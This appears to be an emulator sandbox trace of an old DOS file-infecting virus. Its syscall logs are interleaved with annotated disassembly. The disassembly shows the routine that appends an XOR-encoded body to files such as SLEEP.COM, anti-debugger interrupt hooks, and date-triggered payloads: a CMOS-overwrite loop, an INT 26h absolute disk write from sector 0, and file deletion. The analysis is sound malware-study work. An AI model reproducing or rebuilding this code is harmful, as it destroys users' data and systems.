0x12db3: xor byte ptr [si], 0 ; key operand reads 0 in this listing, which would leave the bytes unchanged
0x12db6: inc si
0x12db7: dec cx
0x12db8: jne 0x12db3
0x12dba: ret
0x12dbb: add word ptr [bx], di ; NOTE(review): bytes after the ret are probably data shown as instructions
0x12dbd: aas
0x12dbe: aas
2018-12-25T12:41:55.346471235Z 64 PC: 12da4 | Write file or device (Write 885 bytes on handle 5)
2018-12-25T12:41:55.365178339Z 62 PC: 12dab | Close file
2018-12-25T12:41:55.371306759Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:55.373886184Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:55.379515673Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:55.385157803Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:55.386769313Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:55.388133829Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:55.389994958Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:55.391592757Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:55.394246089Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:55.400623537Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:55.41038816Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:55.415905496Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:55.423405124Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:55.431037691Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:55.434133142Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:55.43670682Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:55.44019224Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:55.44273131Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:55.445650912Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:55.455647848Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:55.465773863Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:55.469164434Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:55.476920802Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:55.484809721Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:55.486835431Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:55.48843116Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:55.49226889Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:55.494778148Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:55.496599707Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:55.505416897Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:55.514890506Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:55.516903111Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:55.521997252Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:55.527368432Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:55.528901099Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:55.53015336Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:55.532622326Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:55.533778837Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:55.535505233Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:55.541924896Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:55.547391164Z 26 PC: 12aeb | Set disk transfer address
; Payload trigger checks; after INT 21h AH=2Ah, DH = month and DL = day.
2018-12-25T12:41:55.548496088Z 42 PC: 12af7 | Get date 0x12af7: cmp dh, 7 ; month == 7 (July)?
0x12afa: jne 0x12b04
0x12afc: cmp dl, 0xe ; day == 14?
0x12aff: jne 0x12b04
0x12b01: call 0x12b2e ; 14 July only: 0x12b2e is the port 0x70/0x71 write loop
0x12b04: mov ah, 0x2a ; INT 21h AH=2Ah: get date again
0x12b06: int 0x21
0x12b08: cmp dh, 0xb ; month < 11 -> skip
0x12b0b: jl 0x12b15
0x12b0d: cmp dl, 8 ; day < 8 -> skip
0x12b10: jl 0x12b15
0x12b12: call 0x12b3b ; month >= 11 and day >= 8: 0x12b3b is the INT 26h absolute-write routine
0x12b15: mov ah, 0x2a ; INT 21h AH=2Ah: get date
0x12b17: int 0x21
0x12b19: cmp dh, 3 ; month < 3 -> skip
0x12b1c: jl 0x12b21
0x12b1e: call 0x12b4b ; month >= 3: 0x12b4b starts by loading AH=13h (DOS FCB delete)
0x12b21: mov ah, 0x2c ; INT 21h AH=2Ch: get time
0x12b23: int 0x21
0x12b25: cmp dl, 0x19 ; DL = hundredths of a second vs 25; the branch is past this excerpt
; Later date checks, the time check, and the start of the port 0x70/0x71 loop; DH = month, DL = day.
2018-12-25T12:41:55.550888366Z 42 PC: 12b08 | Get date 0x12b08: cmp dh, 0xb ; month < 11 -> skip
0x12b0b: jl 0x12b15
0x12b0d: cmp dl, 8 ; day < 8 -> skip
0x12b10: jl 0x12b15
0x12b12: call 0x12b3b ; month >= 11 and day >= 8: 0x12b3b is the INT 26h absolute-write routine
0x12b15: mov ah, 0x2a ; INT 21h AH=2Ah: get date
0x12b17: int 0x21
0x12b19: cmp dh, 3 ; month < 3 -> skip
0x12b1c: jl 0x12b21
0x12b1e: call 0x12b4b ; month >= 3: 0x12b4b starts by loading AH=13h (DOS FCB delete)
0x12b21: mov ah, 0x2c ; INT 21h AH=2Ch: get time
0x12b23: int 0x21
0x12b25: cmp dl, 0x19 ; DL = hundredths of a second, compared with 25
0x12b28: jge 0x12b2d ; 25 or more -> return
0x12b2a: call 0x12b7e ; target is not listed in the excerpts shown here
0x12b2d: ret
0x12b2e: mov al, 0x25 ; routine called from 0x12b01 on 14 July: AL starts at 0x25
0x12b30: out 0x70, al ; port 0x70: CMOS/RTC index register
0x12b32: out 0x71, al ; port 0x71: CMOS/RTC data register, written with the index value
0x12b34: dec al
; Third date check, time check, the port 0x70/0x71 loop, and the set-up for INT 26h; DH = month.
2018-12-25T12:41:55.552507605Z 42 PC: 12b19 | Get date 0x12b19: cmp dh, 3 ; month < 3 -> skip
0x12b1c: jl 0x12b21
0x12b1e: call 0x12b4b ; month >= 3: 0x12b4b starts by loading AH=13h (DOS FCB delete)
0x12b21: mov ah, 0x2c ; INT 21h AH=2Ch: get time
0x12b23: int 0x21
0x12b25: cmp dl, 0x19 ; DL = hundredths of a second, compared with 25
0x12b28: jge 0x12b2d ; 25 or more -> return
0x12b2a: call 0x12b7e ; target is not listed in the excerpts shown here
0x12b2d: ret
0x12b2e: mov al, 0x25 ; routine called from 0x12b01 on 14 July: AL starts at 0x25
0x12b30: out 0x70, al ; port 0x70: CMOS/RTC index register
0x12b32: out 0x71, al ; port 0x71: CMOS/RTC data register, written with the index value
0x12b34: dec al
0x12b36: cmp al, 0
0x12b38: jne 0x12b30 ; repeats down to index 0x01; port I/O is not a DOS call, so expect no row for it in the syscall table
0x12b3a: ret
0x12b3b: mov ah, 0x19 ; INT 21h AH=19h: get current drive, returned in AL
0x12b3d: int 0x21
0x12b3f: mov cx, 0x1111 ; sector count (4369) for the INT 26h that follows at 0x12b45
0x12b42: mov dx, 0 ; starting logical sector 0
2018-12-25T12:41:55.553920764Z 19 PC: 12b55 | Delete file
; Time check followed by the bodies of two date-triggered routines (CMOS port loop, INT 26h write).
2018-12-25T12:41:55.557743829Z 44 PC: 12b25 | Get time 0x12b25: cmp dl, 0x19 ; DL = hundredths of a second, compared with 25
0x12b28: jge 0x12b2d ; 25 or more -> return
0x12b2a: call 0x12b7e ; target is not listed in the excerpts shown here
0x12b2d: ret
0x12b2e: mov al, 0x25 ; routine called from 0x12b01 on 14 July: AL starts at 0x25
0x12b30: out 0x70, al ; port 0x70: CMOS/RTC index register
0x12b32: out 0x71, al ; port 0x71: CMOS/RTC data register, written with the index value
0x12b34: dec al
0x12b36: cmp al, 0
0x12b38: jne 0x12b30 ; repeats down to index 0x01; port I/O is not a DOS call, so expect no row for it in the syscall table
0x12b3a: ret
0x12b3b: mov ah, 0x19 ; INT 21h AH=19h: get current drive, returned in AL
0x12b3d: int 0x21
0x12b3f: mov cx, 0x1111 ; sector count (4369) for INT 26h
0x12b42: mov dx, 0 ; starting logical sector 0
0x12b45: int 0x26 ; DOS absolute disk write to drive AL; buffer DS:BX is not set in this excerpt
0x12b47: add sp, 2 ; INT 26h returns with the flags word still on the stack
0x12b4a: ret
0x12b4b: mov ah, 0x13 ; AH=13h is the DOS FCB delete function; the INT itself is past this excerpt
0x12b4d: push cs

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":14874,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:41:56.019598382Z 26 PC: 12a73 | Set disk transfer address
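2018-12-25T12:41:56.023721528Z 37 PC: 12a81 | Set interrupt vector (Interrupt = '1' AKA 'Character input') [note: vector 1 is the CPU single-step trap; 'Character input' is the name of DOS function 01h, not of this interrupt]
2018-12-25T12:41:56.024839844Z 37 PC: 12a85 | Set interrupt vector (Interrupt = '3' AKA 'Auxiliary input') [note: vector 3 is the breakpoint interrupt; 'Auxiliary input' is the name of DOS function 03h. Re-pointing vectors 1 and 3 is a common way to disturb a debugger]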
2018-12-25T12:41:56.02628089Z 78 PC: 12ad1 | Find first file
2018-12-25T12:41:56.034208386Z 61 PC: 12d49 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:41:56.04061155Z 63 PC: 12d58 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:41:56.046800424Z 66 PC: 12d67 | Move file pointer
2018-12-25T12:41:56.049668635Z 66 PC: 12d76 | Move file pointer
2018-12-25T12:41:56.051344082Z 64 PC: 12d82 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:41:56.054266584Z 66 PC: 12d8e | Move file pointer
; Append step of the infection routine: patch one byte, XOR the body, write 0x375 bytes, XOR back, close.
2018-12-25T12:41:56.067913407Z 44 PC: 12d92 | Get time 0x12d92: mov byte ptr [bp + 0x475], dl ; DL comes from the Get time call traced on this line; target is likely the imm8 of the xor at 0x12db3 - TODO confirm bp
0x12d96: call 0x12dac ; first XOR pass, before the write
0x12d99: mov ah, 0x40 ; INT 21h AH=40h: write to file handle
0x12d9b: mov cx, 0x375 ; 0x375 = 885 bytes, the size the trace reports for this write
0x12d9e: lea dx, word ptr [bp + 0x106] ; buffer to write starts at bp+0x106
0x12da2: int 0x21
0x12da4: call 0x12dac ; second XOR pass over the same range undoes the first in memory
0x12da7: mov ah, 0x3e ; INT 21h AH=3Eh: close file handle
0x12da9: int 0x21
0x12dab: ret
0x12dac: lea si, word ptr [bp + 0x120] ; XOR range starts 0x1a bytes into the write buffer
0x12db0: mov cx, 0x336 ; 0x336 = 822 bytes
0x12db3: xor byte ptr [si], 0 ; key operand reads 0 in this listing, which would leave the bytes unchanged
0x12db6: inc si
0x12db7: dec cx
0x12db8: jne 0x12db3
0x12dba: ret
0x12dbb: add word ptr [bx], di ; NOTE(review): bytes after the ret are probably data shown as instructions
0x12dbd: aas
0x12dbe: aas
2018-12-25T12:41:56.070342629Z 64 PC: 12da4 | Write file or device (Write 885 bytes on handle 5)
2018-12-25T12:41:56.086086343Z 62 PC: 12dab | Close file
2018-12-25T12:41:56.09390792Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:56.096872256Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:56.102834458Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:56.107589907Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:56.110150696Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:56.111793865Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:56.114368074Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:56.116542745Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:56.119244466Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:56.126665087Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:56.13476833Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:56.136732672Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:56.141937014Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:56.149336611Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:56.151079991Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:56.153257807Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:56.157470131Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:56.158949253Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:56.161237767Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:56.169941833Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:56.17840851Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:56.195086114Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:56.20227711Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:56.208789528Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:56.210476787Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:56.212804201Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:56.216480402Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:56.218092682Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:56.220707936Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:56.230227822Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:56.24981594Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:56.252499304Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:56.259631571Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:56.265871751Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:56.267318726Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:56.269834531Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:56.273047552Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:56.274851231Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:56.278497394Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:56.287255792Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:56.296180323Z 26 PC: 12aeb | Set disk transfer address
; Payload trigger checks; after INT 21h AH=2Ah, DH = month and DL = day.
2018-12-25T12:41:56.297700924Z 42 PC: 12af7 | Get date 0x12af7: cmp dh, 7 ; month == 7 (July)?
0x12afa: jne 0x12b04
0x12afc: cmp dl, 0xe ; day == 14?
0x12aff: jne 0x12b04
0x12b01: call 0x12b2e ; 14 July only: 0x12b2e is the port 0x70/0x71 write loop
0x12b04: mov ah, 0x2a ; INT 21h AH=2Ah: get date again
0x12b06: int 0x21
0x12b08: cmp dh, 0xb ; month < 11 -> skip
0x12b0b: jl 0x12b15
0x12b0d: cmp dl, 8 ; day < 8 -> skip
0x12b10: jl 0x12b15
0x12b12: call 0x12b3b ; month >= 11 and day >= 8: 0x12b3b is the INT 26h absolute-write routine
0x12b15: mov ah, 0x2a ; INT 21h AH=2Ah: get date
0x12b17: int 0x21
0x12b19: cmp dh, 3 ; month < 3 -> skip
0x12b1c: jl 0x12b21
0x12b1e: call 0x12b4b ; month >= 3: 0x12b4b starts by loading AH=13h (DOS FCB delete)
0x12b21: mov ah, 0x2c ; INT 21h AH=2Ch: get time
0x12b23: int 0x21
0x12b25: cmp dl, 0x19 ; DL = hundredths of a second vs 25; the branch is past this excerpt
; Later date checks, the time check, and the start of the port 0x70/0x71 loop; DH = month, DL = day.
2018-12-25T12:41:56.300874109Z 42 PC: 12b08 | Get date 0x12b08: cmp dh, 0xb ; month < 11 -> skip
0x12b0b: jl 0x12b15
0x12b0d: cmp dl, 8 ; day < 8 -> skip
0x12b10: jl 0x12b15
0x12b12: call 0x12b3b ; month >= 11 and day >= 8: 0x12b3b is the INT 26h absolute-write routine
0x12b15: mov ah, 0x2a ; INT 21h AH=2Ah: get date
0x12b17: int 0x21
0x12b19: cmp dh, 3 ; month < 3 -> skip
0x12b1c: jl 0x12b21
0x12b1e: call 0x12b4b ; month >= 3: 0x12b4b starts by loading AH=13h (DOS FCB delete)
0x12b21: mov ah, 0x2c ; INT 21h AH=2Ch: get time
0x12b23: int 0x21
0x12b25: cmp dl, 0x19 ; DL = hundredths of a second, compared with 25
0x12b28: jge 0x12b2d ; 25 or more -> return
0x12b2a: call 0x12b7e ; target is not listed in the excerpts shown here
0x12b2d: ret
0x12b2e: mov al, 0x25 ; routine called from 0x12b01 on 14 July: AL starts at 0x25
0x12b30: out 0x70, al ; port 0x70: CMOS/RTC index register
0x12b32: out 0x71, al ; port 0x71: CMOS/RTC data register, written with the index value
0x12b34: dec al
; Third date check, time check, the port 0x70/0x71 loop, and the set-up for INT 26h; DH = month.
2018-12-25T12:41:56.303224966Z 42 PC: 12b19 | Get date 0x12b19: cmp dh, 3 ; month < 3 -> skip
0x12b1c: jl 0x12b21
0x12b1e: call 0x12b4b ; month >= 3: 0x12b4b starts by loading AH=13h (DOS FCB delete)
0x12b21: mov ah, 0x2c ; INT 21h AH=2Ch: get time
0x12b23: int 0x21
0x12b25: cmp dl, 0x19 ; DL = hundredths of a second, compared with 25
0x12b28: jge 0x12b2d ; 25 or more -> return
0x12b2a: call 0x12b7e ; target is not listed in the excerpts shown here
0x12b2d: ret
0x12b2e: mov al, 0x25 ; routine called from 0x12b01 on 14 July: AL starts at 0x25
0x12b30: out 0x70, al ; port 0x70: CMOS/RTC index register
0x12b32: out 0x71, al ; port 0x71: CMOS/RTC data register, written with the index value
0x12b34: dec al
0x12b36: cmp al, 0
0x12b38: jne 0x12b30 ; repeats down to index 0x01; port I/O is not a DOS call, so expect no row for it in the syscall table
0x12b3a: ret
0x12b3b: mov ah, 0x19 ; INT 21h AH=19h: get current drive, returned in AL
0x12b3d: int 0x21
0x12b3f: mov cx, 0x1111 ; sector count (4369) for the INT 26h that follows at 0x12b45
0x12b42: mov dx, 0 ; starting logical sector 0
; Time check followed by the bodies of two date-triggered routines (CMOS port loop, INT 26h write).
2018-12-25T12:41:56.305565002Z 44 PC: 12b25 | Get time 0x12b25: cmp dl, 0x19 ; DL = hundredths of a second, compared with 25
0x12b28: jge 0x12b2d ; 25 or more -> return
0x12b2a: call 0x12b7e ; target is not listed in the excerpts shown here
0x12b2d: ret
0x12b2e: mov al, 0x25 ; routine called from 0x12b01 on 14 July: AL starts at 0x25
0x12b30: out 0x70, al ; port 0x70: CMOS/RTC index register
0x12b32: out 0x71, al ; port 0x71: CMOS/RTC data register, written with the index value
0x12b34: dec al
0x12b36: cmp al, 0
0x12b38: jne 0x12b30 ; repeats down to index 0x01; port I/O is not a DOS call, so expect no row for it in the syscall table
0x12b3a: ret
0x12b3b: mov ah, 0x19 ; INT 21h AH=19h: get current drive, returned in AL
0x12b3d: int 0x21
0x12b3f: mov cx, 0x1111 ; sector count (4369) for INT 26h
0x12b42: mov dx, 0 ; starting logical sector 0
0x12b45: int 0x26 ; DOS absolute disk write to drive AL; buffer DS:BX is not set in this excerpt
0x12b47: add sp, 2 ; INT 26h returns with the flags word still on the stack
0x12b4a: ret
0x12b4b: mov ah, 0x13 ; AH=13h is the DOS FCB delete function; the INT itself is past this excerpt
0x12b4d: push cs

{"DateBased":true,"Day":1,"Month":11,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":14874,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:41:56.109962302Z 26 PC: 12a73 | Set disk transfer address
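2018-12-25T12:41:56.11153659Z 37 PC: 12a81 | Set interrupt vector (Interrupt = '1' AKA 'Character input') [note: vector 1 is the CPU single-step trap; 'Character input' is the name of DOS function 01h, not of this interrupt]
2018-12-25T12:41:56.113093719Z 37 PC: 12a85 | Set interrupt vector (Interrupt = '3' AKA 'Auxiliary input') [note: vector 3 is the breakpoint interrupt; 'Auxiliary input' is the name of DOS function 03h. Re-pointing vectors 1 and 3 is a common way to disturb a debugger]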
2018-12-25T12:41:56.114372779Z 78 PC: 12ad1 | Find first file
2018-12-25T12:41:56.121309901Z 61 PC: 12d49 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:41:56.128906366Z 63 PC: 12d58 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:41:56.135946693Z 66 PC: 12d67 | Move file pointer
2018-12-25T12:41:56.137503658Z 66 PC: 12d76 | Move file pointer
2018-12-25T12:41:56.139756337Z 64 PC: 12d82 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:41:56.142857883Z 66 PC: 12d8e | Move file pointer
; Append step of the infection routine: patch one byte, XOR the body, write 0x375 bytes, XOR back, close.
2018-12-25T12:41:56.144363785Z 44 PC: 12d92 | Get time 0x12d92: mov byte ptr [bp + 0x475], dl ; DL comes from the Get time call traced on this line; target is likely the imm8 of the xor at 0x12db3 - TODO confirm bp
0x12d96: call 0x12dac ; first XOR pass, before the write
0x12d99: mov ah, 0x40 ; INT 21h AH=40h: write to file handle
0x12d9b: mov cx, 0x375 ; 0x375 = 885 bytes, the size the trace reports for this write
0x12d9e: lea dx, word ptr [bp + 0x106] ; buffer to write starts at bp+0x106
0x12da2: int 0x21
0x12da4: call 0x12dac ; second XOR pass over the same range undoes the first in memory
0x12da7: mov ah, 0x3e ; INT 21h AH=3Eh: close file handle
0x12da9: int 0x21
0x12dab: ret
0x12dac: lea si, word ptr [bp + 0x120] ; XOR range starts 0x1a bytes into the write buffer
0x12db0: mov cx, 0x336 ; 0x336 = 822 bytes
0x12db3: xor byte ptr [si], 0 ; key operand reads 0 in this listing, which would leave the bytes unchanged
0x12db6: inc si
0x12db7: dec cx
0x12db8: jne 0x12db3
0x12dba: ret
0x12dbb: add word ptr [bx], di ; NOTE(review): bytes after the ret are probably data shown as instructions
0x12dbd: aas
0x12dbe: aas
2018-12-25T12:41:56.147458256Z 64 PC: 12da4 | Write file or device (Write 885 bytes on handle 5)
2018-12-25T12:41:56.164980716Z 62 PC: 12dab | Close file
2018-12-25T12:41:56.176049373Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:56.184109792Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:56.191604826Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:56.198749962Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:56.201501707Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:56.203165877Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:56.206420174Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:56.208527812Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:56.2124635Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:56.221657187Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:56.231398426Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:56.235879828Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:56.243196459Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:56.250809747Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:56.253233396Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:56.25475075Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:56.257860029Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:56.260119587Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:56.263195013Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:56.272414638Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:56.282000235Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:56.285301272Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:56.292989106Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:56.300688569Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:56.303325265Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:56.305261688Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:56.3079359Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:56.332481847Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:56.335261711Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:56.347922533Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:56.361884572Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:56.369309352Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:56.376635682Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:56.384413405Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:56.385949143Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:56.387505306Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:56.391012786Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:56.392626664Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:56.395757618Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:56.40694275Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:56.416460006Z 26 PC: 12aeb | Set disk transfer address
; Payload trigger checks; after INT 21h AH=2Ah, DH = month and DL = day.
2018-12-25T12:41:56.417880521Z 42 PC: 12af7 | Get date 0x12af7: cmp dh, 7 ; month == 7 (July)?
0x12afa: jne 0x12b04
0x12afc: cmp dl, 0xe ; day == 14?
0x12aff: jne 0x12b04
0x12b01: call 0x12b2e ; 14 July only: 0x12b2e is the port 0x70/0x71 write loop
0x12b04: mov ah, 0x2a ; INT 21h AH=2Ah: get date again
0x12b06: int 0x21
0x12b08: cmp dh, 0xb ; month < 11 -> skip
0x12b0b: jl 0x12b15
0x12b0d: cmp dl, 8 ; day < 8 -> skip
0x12b10: jl 0x12b15
0x12b12: call 0x12b3b ; month >= 11 and day >= 8: 0x12b3b is the INT 26h absolute-write routine
0x12b15: mov ah, 0x2a ; INT 21h AH=2Ah: get date
0x12b17: int 0x21
0x12b19: cmp dh, 3 ; month < 3 -> skip
0x12b1c: jl 0x12b21
0x12b1e: call 0x12b4b ; month >= 3: 0x12b4b starts by loading AH=13h (DOS FCB delete)
0x12b21: mov ah, 0x2c ; INT 21h AH=2Ch: get time
0x12b23: int 0x21
0x12b25: cmp dl, 0x19 ; DL = hundredths of a second vs 25; the branch is past this excerpt
; Later date checks, the time check, and the start of the port 0x70/0x71 loop; DH = month, DL = day.
2018-12-25T12:41:56.421051038Z 42 PC: 12b08 | Get date 0x12b08: cmp dh, 0xb ; month < 11 -> skip
0x12b0b: jl 0x12b15
0x12b0d: cmp dl, 8 ; day < 8 -> skip
0x12b10: jl 0x12b15
0x12b12: call 0x12b3b ; month >= 11 and day >= 8: 0x12b3b is the INT 26h absolute-write routine
0x12b15: mov ah, 0x2a ; INT 21h AH=2Ah: get date
0x12b17: int 0x21
0x12b19: cmp dh, 3 ; month < 3 -> skip
0x12b1c: jl 0x12b21
0x12b1e: call 0x12b4b ; month >= 3: 0x12b4b starts by loading AH=13h (DOS FCB delete)
0x12b21: mov ah, 0x2c ; INT 21h AH=2Ch: get time
0x12b23: int 0x21
0x12b25: cmp dl, 0x19 ; DL = hundredths of a second, compared with 25
0x12b28: jge 0x12b2d ; 25 or more -> return
0x12b2a: call 0x12b7e ; target is not listed in the excerpts shown here
0x12b2d: ret
0x12b2e: mov al, 0x25 ; routine called from 0x12b01 on 14 July: AL starts at 0x25
0x12b30: out 0x70, al ; port 0x70: CMOS/RTC index register
0x12b32: out 0x71, al ; port 0x71: CMOS/RTC data register, written with the index value
0x12b34: dec al
; Third date check, time check, the port 0x70/0x71 loop, and the set-up for INT 26h; DH = month.
2018-12-25T12:41:56.428592467Z 42 PC: 12b19 | Get date 0x12b19: cmp dh, 3 ; month < 3 -> skip
0x12b1c: jl 0x12b21
0x12b1e: call 0x12b4b ; month >= 3: 0x12b4b starts by loading AH=13h (DOS FCB delete)
0x12b21: mov ah, 0x2c ; INT 21h AH=2Ch: get time
0x12b23: int 0x21
0x12b25: cmp dl, 0x19 ; DL = hundredths of a second, compared with 25
0x12b28: jge 0x12b2d ; 25 or more -> return
0x12b2a: call 0x12b7e ; target is not listed in the excerpts shown here
0x12b2d: ret
0x12b2e: mov al, 0x25 ; routine called from 0x12b01 on 14 July: AL starts at 0x25
0x12b30: out 0x70, al ; port 0x70: CMOS/RTC index register
0x12b32: out 0x71, al ; port 0x71: CMOS/RTC data register, written with the index value
0x12b34: dec al
0x12b36: cmp al, 0
0x12b38: jne 0x12b30 ; repeats down to index 0x01; port I/O is not a DOS call, so expect no row for it in the syscall table
0x12b3a: ret
0x12b3b: mov ah, 0x19 ; INT 21h AH=19h: get current drive, returned in AL
0x12b3d: int 0x21
0x12b3f: mov cx, 0x1111 ; sector count (4369) for the INT 26h that follows at 0x12b45
0x12b42: mov dx, 0 ; starting logical sector 0
2018-12-25T12:41:56.431366255Z 19 PC: 12b55 | Delete file
; Time check followed by the bodies of two date-triggered routines (CMOS port loop, INT 26h write).
2018-12-25T12:41:56.438308134Z 44 PC: 12b25 | Get time 0x12b25: cmp dl, 0x19 ; DL = hundredths of a second, compared with 25
